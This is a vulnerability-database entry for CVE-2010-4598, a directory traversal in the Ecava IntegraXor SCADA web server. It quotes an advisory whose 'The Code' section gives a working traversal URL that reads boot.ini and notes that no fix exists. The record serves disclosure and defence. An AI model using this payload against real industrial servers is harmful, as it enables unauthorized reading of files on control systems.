ID

VAR-E-201012-0465


CVE

cve_id:CVE-2010-4598

Trust: 1.9

sources: BID: 45535 // EXPLOIT-DB: 15802 // EDBNET: 38629

EDB ID

15802


TITLE

ecava IntegraXor 3.6.4000.0 - Directory Traversal - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 15802

DESCRIPTION

ecava IntegraXor 3.6.4000.0 - Directory Traversal. CVE-2010-4598CVE-69968 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 15802

AFFECTED PRODUCTS

vendor:ecavamodel:integraxorscope:eqversion:3.6.4000.0

Trust: 1.9

vendor:ecavamodel:integraxorscope:eqversion:3.5.3900.5

Trust: 0.3

vendor:ecavamodel:integraxorscope:eqversion:3.5.3900.10

Trust: 0.3

vendor:ecavamodel:integraxorscope:eqversion:3.5

Trust: 0.3

sources: BID: 45535 // EXPLOIT-DB: 15802 // EDBNET: 38629

EXPLOIT

Source: http://aluigi.org/adv/integraxor_1-adv.txt

#######################################################################

Luigi Auriemma

Application: Ecava IntegraXor
http://www.integraxor.com
Versions: <= 3.6.4000.0
Platforms: Windows
Bug : directory traversal
Exploitation: remote, versus server
Date: 21 Dec 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

IntegraXor is a web SCADA server used primarily in Malaysia.

#######################################################################

======
2) Bug
======

The "open" request can be used by an attacker to download files from
the disk where the server is installed through directory traversal
attacks.

#######################################################################

===========
3) The Code
===========

http://SERVER:7131/PROJECT_NAME/open?file_name=..\..\..\..\..\..\..\..\..\..\..\boot.ini

where PROJECT_NAME is the name of one of the projects hosted by the
server.

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Trust: 1.0

sources: EXPLOIT-DB: 15802

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 15802

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 15802

TYPE

Directory Traversal

Trust: 1.6

sources: EXPLOIT-DB: 15802 // EDBNET: 38629

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 15802

EXTERNAL IDS

db:NVDid:CVE-2010-4598

Trust: 1.9

db:EXPLOIT-DBid:15802

Trust: 1.6

db:EDBNETid:38629

Trust: 0.6

db:CERT/CCid:VU#979776

Trust: 0.3

db:BIDid:45535

Trust: 0.3

sources: BID: 45535 // EXPLOIT-DB: 15802 // EDBNET: 38629

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-4598

Trust: 1.6

url:http://aluigi.org/adv/integraxor_1-adv.txt

Trust: 1.3

url:https://www.exploit-db.com/exploits/15802/

Trust: 0.6

url:http://www.kb.cert.org/vuls/id/979776

Trust: 0.3

url:http://www.ecava.com/index.htm

Trust: 0.3

url:http://www.integraxor.com/blog/integraxor-3-6-scada-security-issue-20101222-0323-vulnerability-note

Trust: 0.3

sources: BID: 45535 // EXPLOIT-DB: 15802 // EDBNET: 38629

SOURCES

db:BIDid:45535
db:EXPLOIT-DBid:15802
db:EDBNETid:38629

LAST UPDATE DATE

2022-07-27T09:35:55.660000+00:00


SOURCES UPDATE DATE

db:BIDid:45535date:2011-01-11T15:22:00

SOURCES RELEASE DATE

db:BIDid:45535date:2010-12-21T00:00:00
db:EXPLOIT-DBid:15802date:2010-12-21T00:00:00
db:EDBNETid:38629date:2010-12-21T00:00:00